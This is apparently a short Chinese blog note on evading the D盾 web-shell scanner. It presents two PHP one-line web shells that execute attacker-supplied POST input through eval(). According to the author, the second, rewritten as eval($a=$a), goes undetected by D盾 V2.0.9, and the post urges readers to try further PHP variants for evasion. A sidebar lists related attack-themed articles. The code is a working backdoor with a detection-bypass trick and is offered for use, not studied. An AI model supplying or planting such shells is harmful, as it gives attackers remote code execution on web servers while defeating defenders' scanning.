绕过D盾的一句话

简介: 一个很简单的一个技巧,作个笔记,可以绕过D盾检测。 新建test1.php 新建test2.php 使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。

 

一个很简单的一个技巧,作个笔记,可以绕过D盾检测。

新建test1.php

<?php
eval($_POST[g]);
?>

新建test2.php

<?php
$a="$_POST[g]";
eval($a=$a);
?>

使用D盾_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。

那么问题就出现在eval($a=$a)这样的形式,eval()很容易就被查杀出来,但对于这样一种形式就无法查杀。

可以预见基于特征的代码查杀,在一定程度上能够检测出一些问题,但是对于一些特殊形式的变形,还是无法查杀。

PHP是一门很灵活的语言,可以通过它的特性,去尝试更多的函数形式,达到绕过的效果。

 

目录
相关文章
|
11月前
|
SQL 安全 前端开发
渗透攻击实例-邪恶的CSRF(社会工程学)
渗透攻击实例-邪恶的CSRF(社会工程学)
|
4月前
|
安全 数据库 数据安全/隐私保护
撞库攻击是什么?如何有效阻止撞库攻击?
通过采取这些防护措施,可以有效降低撞库攻击的成功几率,保护用户的账户和数据安全。
226 0
撞库攻击是什么?如何有效阻止撞库攻击?
|
12月前
|
安全 网络安全
技巧!通过360卫士白名单绕过查杀
技巧!通过360卫士白名单绕过查杀
397 0
|
安全 前端开发 JavaScript
网站漏洞修复服务商对绕过认证漏洞的介绍
本月带给大家的是网站绕过认证漏洞。为了更好地确保业务管理系统的安全防护,基本上每一系统软件都是会存有各式各样的认证功能。普遍的几类认证功能就包含账户密码认证、验证码短信认证、JavaScript数据信息内容认证及服务器端数据信息内容认证这些,但写代码的技术员在涉及到认证方法时很有可能存有缺点造成被绕过,因此小结了下列几类绕过认证的姿态和大伙儿一块探讨探讨。
117 0
网站漏洞修复服务商对绕过认证漏洞的介绍
|
Web App开发 安全 网络安全
烟草网站如何实现防攻击、防病毒、防篡改
网站,作为企业网络公众形象的载体,承担了企业形象宣传的重任。在我国,烟草施行的是国家专卖制度,既关注行业行政管理,又关注企业的生产运营,烟草网站既担负着政策信息发布、政府信息公开的职责,又兼有面对烟草企业、消费者等进行信息交互的职责。
1749 0
|
安全 网络安全 数据安全/隐私保护
|
Web App开发 新零售 安全
HTTPS劫匪木马暴力升级:破坏ARK攻击杀软
本文讲的是HTTPS劫匪木马暴力升级:破坏ARK攻击杀软,目前,越来越多的网站开始注册证书,提供对HTTPS的支持,保护自己站点不被劫持。而作为对立面的流量劫持攻击,也开始将矛头对准HTTPS,其中最常见的一种方法便是伪造证书,做中间人劫持。
1771 0